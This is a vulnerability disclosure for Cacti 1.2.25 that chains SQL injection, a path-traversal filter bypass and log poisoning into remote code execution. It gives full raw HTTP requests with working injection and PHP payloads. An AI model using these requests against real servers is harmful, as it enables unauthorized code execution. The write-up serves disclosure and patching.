Local File Inclusion (RCE)

Product: Cacti
Version: 1.2.25
Description: While using the detected SQL Injection and insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the link.php. Impact of the vulnerability – execution of arbitrary code on the server.
Mitigation: Improve data escaping to prevent Local File Inclusion.

Research

Local File Inclusion was executed in the link.php. file.
Line 27 from the external_links table in the database requests information. Line 56 checks the permission to compare the id record with the one from the database. On line 79 the path to the file is formed, it will be checked for existence on line 81 and included on line 82.

Figure 1. Script link.php with the vulnerability of going outside the directory when using SQL Injection, considered earlier

Further in this report the way to execute arbitrary code on the server will be demonstrated.
First, you need to use the found SQL Injection to write some information into the external_links table. The most important thing is to write down the correct contentfile value.

Listing 1. Writing data via SQL Injection to the external_links table

POST /cacti/pollers.php?header=false HTTP/1.1
Host: ***.***.*.174:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/119.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 419
Origin: http://***.***.*.174:8080
Connection: close
Referer: http://***.***.*.174:8080/cacti/pollers.php?action=edit&id=1
Cookie: CactiDateTime=Sat Oct 28 2023 22:51:39 GMT+0300 (�о�ква,
��анда��ное в�ем�); CactiTimeZone=180;
Cacti=acbmsv2adk9forvpkqt0njd1oc;
cacti_remembers=1%2C0%2C28a320bc68fa35780e2f050b1f2eb14c0f0adc1d11112f87cf2360dd1
bbdc939; CactiDateTime=Fri Oct 27 2023 12:27:36 GMT+0300 (�о�ква,
��анда��ное в�ем�); CactiTimeZone=180
__csrf_magic=sid%3A1f5ff4435f8a2bc44a869ed53a0024cbedd194d5%2C1698525354&name=Mai
n+Poller&hostname=unknown&timezone=&notes=&processes=1&threads=1&id=2&save_compon
ent_poller=1&dbhost=";INSERT%20INTO%20external_links%20(id,sortorder,enabled,cont
entfile,title,style)%20values%20(10,2,"on","....//....//....//....//opt/cacti/log
/cacti.log","Test","TAB");%20select%20*%20from%20poller%20where%201=1%20and%20"%"
="&action=save

After running an HTTP request with SQL Injection to write the required data to the external_links table, some information appeared.

Figure 2. Recorded data in the external_links table via SQL Injection

The entry with id = 10 contains the value ....//....//....//....//opt/cacti/log/cacti.log in the contentfile field. This value was chosen for two reasons:

1. Using this value sanitization can be bypassed, which will lead to the construction of an arbitrary and valid path to any file in the system

Figure 3. Attempt to prevent going outside the directory

Figure 4. Demonstration of circumvention of the mechanism to prevent going outside the directory

2. The file /opt/cacti/log/cacti.log can be rewritten by the user www-data. This will allow to poison the file with a payload that will appear without sanitization in the log file /opt/cacti/log/cacti.log. Poisoning of the log file will happen using the previously found SQL Injection (Error-Based).

Listing 6. Poisoning the logging file /opt/cacti/log/cacti.log with data that will lead to remote code execution

POST /cacti/pollers.php?header=false HTTP/1.1
Host: ***.***.*.174:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/119.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 295
Origin: http://***.***.*.174:8080
Connection: close
Referer: http://***.***.*.174:8080/cacti/pollers.php?action=edit&id=1
Cookie: CactiDateTime=Sat Oct 28 2023 22:51:39 GMT+0300 (�о�ква,
��анда��ное в�ем�); CactiTimeZone=180;
Cacti=acbmsv2adk9forvpkqt0njd1oc;
cacti_remembers=1%2C0%2C28a320bc68fa35780e2f050b1f2eb14c0f0adc1d11112f87cf2360dd1
bbdc939; CactiDateTime=Fri Oct 27 2023 12:27:36 GMT+0300 (�о�ква,
��анда��ное в�ем�); CactiTimeZone=180
__csrf_magic=sid%3A1f5ff4435f8a2bc44a869ed53a0024cbedd194d5%2C1698525354&name=Mai
n+Poller&hostname=unknown&timezone=&notes=&processes=1&threads=1&id=2&save_compon
ent_poller=1&dbhost="%20and%20updatexml(rand(),concat(CHAR(126),'<?php+system(\'i
d\')+?>',CHAR(126)),null)%20and%20"%"="%&action=save

Figure 5. HTTP request and HTTP response poisoning of the logging file /opt/cacti/log/cacti.log

After executing the request, a payload injected via Error-Based SQL Injection with the value <?php system('id'); ?> appeared in the file /opt/cacti/log/cacti.log.

Figure 6. Demonstration of the sent logging file /opt/cacti/log/cacti.log using Error-Based SQL Injection

All that remains is to make sure that the is_realm_allowed function returns a positive result - then execution begins in the desired direction. This can be achieved by giving permission to the user (Configuration -> Users -> User -> Permissions -> External Link Permissions).

Figure 7. Enabling external link resolution for the current user

The Test item appeared in the menu (which was written to the database using SQL Injection). When you click on it, the poisoned log file is connected and the php code is executed on the server. In this case, the result of executing the system('id') command is visible.

Figure 8. Demonstration of remote code execution on the server when using the system('id') command

Researcher: Aleksey Solovev (Positive Technologies)